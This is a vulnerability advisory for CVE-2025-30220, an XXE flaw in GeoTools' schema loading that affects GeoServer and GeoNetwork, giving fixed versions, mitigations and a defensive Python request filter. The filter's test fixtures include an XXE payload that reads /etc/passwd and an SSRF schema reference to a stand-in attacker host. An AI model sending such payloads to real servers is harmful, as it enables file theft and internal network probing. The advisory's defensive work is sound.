CVE-2025-30220
Published: 10 June 2025
Summary
CVE-2025-30220 is a critical-severity Improper Restriction of XML External Entity Reference (CWE-611) vulnerability in GeoTools, specifically the Schemas class of the gt-xsd-core module. Its CVSS base score is 9.9 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Data from Local System (T1005). The CVE ranks in the top 5.5% of all CVEs by predicted exploit likelihood, is not currently listed in the CISA KEV catalog, and has a referenced public proof-of-concept.
Deeper analysis
GeoServer is an open source server for sharing and editing geospatial data and is built on GeoTools, where the vulnerability resides: the gt-xsd-core Schemas class uses the Eclipse XSD library to load schema structures, and when a parsed XML document references an external schema (for instance through an xsi:schemaLocation attribute) Schemas does not apply the EntityResolver configured on the ParserHandler. The referenced schema, and any external entities it or the document declares, are therefore resolved without restriction, which is XML External Entity processing. The gt-wfs-ng DataStore is affected in the same way because its ENTITY_RESOLVER connection parameter was not being passed through to the schema-loading code. The issue affects GeoServer, GeoTools and GeoNetwork installations that expose any XML parsing path built on gt-xsd-core.
An unauthenticated remote attacker can submit a crafted XML document whose external schema reference, or the entities declared in the schema it points to, the server resolves on the attacker's behalf, producing XXE and the related SSRF behaviour. Successful exploitation can yield arbitrary file disclosure, internal network probing, or limited service disruption, consistent with the CVSS 9.9 rating, which reflects a network attack vector, no required credentials or user interaction, and changed scope.
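The check below is an added example and is not GeoTools, GeoServer or GeoNetwork code. It models, with only the Python standard library, the policy an honoured EntityResolver is supposed to enforce, applied to a request body before it reaches an unpatched WFS or XSD parsing path: DOCTYPE and entity declarations are rejected, external entity references are reported without being fetched, and every external schema location (xsi:schemaLocation pairs, xsi:noNamespaceSchemaLocation, and schemaLocation on xs:import / xs:include) is checked against a host allow-list. The allow-list hosts, the WFS request bodies and the attacker host name are all constructed for illustration.

```python
"""Pre-parse policy check for XML bodies bound for a WFS / XSD parsing path.

Added example (not GeoTools, GeoServer or GeoNetwork code). It models the
policy an honoured EntityResolver enforces: DOCTYPE and entity declarations
are rejected, external entity references are reported without being fetched,
and every external schema location is checked against a host allow-list.
Standard library only; host names and request bodies below are constructed.
"""
from urllib.parse import urlsplit
import xml.parsers.expat as expat

XSI_NS = "http://www.w3.org/2001/XMLSchema-instance"
XSD_NS = "http://www.w3.org/2001/XMLSchema"
NS_SEP = " "  # expat reports namespaced names as "<uri><sep><local>"

# Assumed allow-list: the OGC schema host plus the deployment's own host.
ALLOWED_HOSTS = ("schemas.opengis.net", "geoserver.example")


def _schema_locations(name, attrs):
    """Yield each schema URL an element pulls in: the locations inside
    xsi:schemaLocation (namespace/location pairs), xsi:noNamespaceSchemaLocation,
    and schemaLocation on xs:import / xs:include, since a fetched schema is
    itself parsed and must obey the same policy."""
    for attr, value in attrs.items():
        ns, _, local = attr.rpartition(NS_SEP)
        if ns == XSI_NS and local == "schemaLocation":
            yield from value.split()[1::2]  # odd entries are the locations
        elif ns == XSI_NS and local == "noNamespaceSchemaLocation":
            yield value.strip()
        elif ns == "" and local == "schemaLocation" and name.startswith(XSD_NS + NS_SEP):
            yield value.strip()


def check_xml_request(body, allowed_hosts=ALLOWED_HOSTS):
    """Return the list of policy violations found in body (empty means clean).
    Nothing is fetched: the handlers only record what the document would resolve."""
    allowed = {h.lower() for h in allowed_hosts}
    violations = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        violations.append(f"DOCTYPE declaration for <{name}> (sysid={sysid!r})")

    def on_entity_decl(ename, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        if sysid is not None:
            violations.append(f"external {kind} entity {ename!r} -> {sysid}")
        else:
            violations.append(f"internal {kind} entity {ename!r} declared")

    def on_external_ref(context, base, sysid, pubid):
        violations.append(f"external entity reference to {sysid}")
        return 1  # tell expat to continue; the entity is skipped, not loaded

    def on_start_element(name, attrs):
        for loc in _schema_locations(name, attrs):
            parts = urlsplit(loc)
            host = (parts.hostname or "").lower()
            if parts.scheme not in ("http", "https"):
                violations.append(f"schema location {loc!r} has scheme {parts.scheme or 'none'!r}")
            elif host not in allowed:
                violations.append(f"schema location {loc!r} host {host!r} not allow-listed")

    parser = expat.ParserCreate(namespace_separator=NS_SEP)
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start_element
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        violations.append(f"not well-formed XML: {exc}")
    return violations


# Constructed sample bodies (not captured traffic).
BENIGN_GETFEATURE = b"""<?xml version="1.0"?>
<wfs:GetFeature service="WFS" version="1.1.0"
    xmlns:wfs="http://www.opengis.net/wfs"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://www.opengis.net/wfs http://schemas.opengis.net/wfs/1.1.0/wfs.xsd">
  <wfs:Query typeName="topp:states"/>
</wfs:GetFeature>"""

# Same request, but the schema reference now points at an attacker-chosen host.
SSRF_SCHEMA = BENIGN_GETFEATURE.replace(
    b"http://schemas.opengis.net/wfs/1.1.0/wfs.xsd", b"http://attacker.example/wfs.xsd")

# Classic XXE shape: an external general entity declared in the internal subset.
XXE_BODY = b"""<?xml version="1.0"?>
<!DOCTYPE wfs:GetFeature [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs">
  <wfs:Query>&xxe;</wfs:Query>
</wfs:GetFeature>"""

if __name__ == "__main__":
    for label, body in [("benign", BENIGN_GETFEATURE), ("ssrf", SSRF_SCHEMA), ("xxe", XXE_BODY)]:
        print(label, check_xml_request(body) or "clean")
```

This is a pre-filter for a reverse proxy or WAF in front of an unpatched instance, not a substitute for upgrading: it can only see the request, so a DOCTYPE inside a schema the server fetches is invisible to it, which is exactly why the schema host allow-list, rather than the DOCTYPE check, carries the weight against this CVE.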
Official fixes are available in GeoTools 33.1, 32.3, 31.7 and 28.6.1; GeoServer 2.27.1, 2.26.3 and 2.25.7; and GeoNetwork 4.4.8 and 4.2.13. For deployments that cannot upgrade immediately, the GeoServer documentation recommends explicit configuration to disable external entity resolution, and GeoNetwork has published the corresponding pull requests and a security advisory describing the parameter-handling corrections.
The EPSS score stands at 0.1394, which is also its recorded peak; despite the public proof-of-concept, observed exploitation interest has so far been limited, and the CVE is not listed in CISA KEV.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-17683
Vulnerability details
GeoServer is an open source server that allows users to share and edit geospatial data. The GeoTools Schema class's use of the Eclipse XSD library to represent the schema data structure is vulnerable to an XML External Entity (XXE) exploit. This impacts whoever exposes XML processing with gt-xsd-core involved in parsing, when the documents carry a reference to an external XML schema. The gt-xsd-core Schemas class is not using the EntityResolver provided by the ParserHandler (if any was configured). This also impacts users of the gt-wfs-ng DataStore, where the ENTITY_RESOLVER connection parameter was not being used as intended. This vulnerability is fixed in GeoTools 33.1, 32.3, 31.7, and 28.6.1, GeoServer 2.27.1, 2.26.3, and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13.
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The XXE vulnerability (CWE-611) in the GeoServer/GeoNetwork WFS services enables unauthenticated remote exploitation of a public-facing application (T1190), local file disclosure (T1005), and SSRF used for internal network service discovery (T1046).
Mitigating Controls
Likely Mitigating Controls
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
- Penetration testing that includes XML external entity payloads detects XXE vulnerabilities so they can be mitigated.
- Monitoring for unusual file or network access, or for abnormal resource usage, identifies XML external entity processing.
- Outbound connections to external resources can be monitored and limited at the network boundary, reducing SSRF impact.
- Validating server-side URLs and resource references blocks SSRF attempts.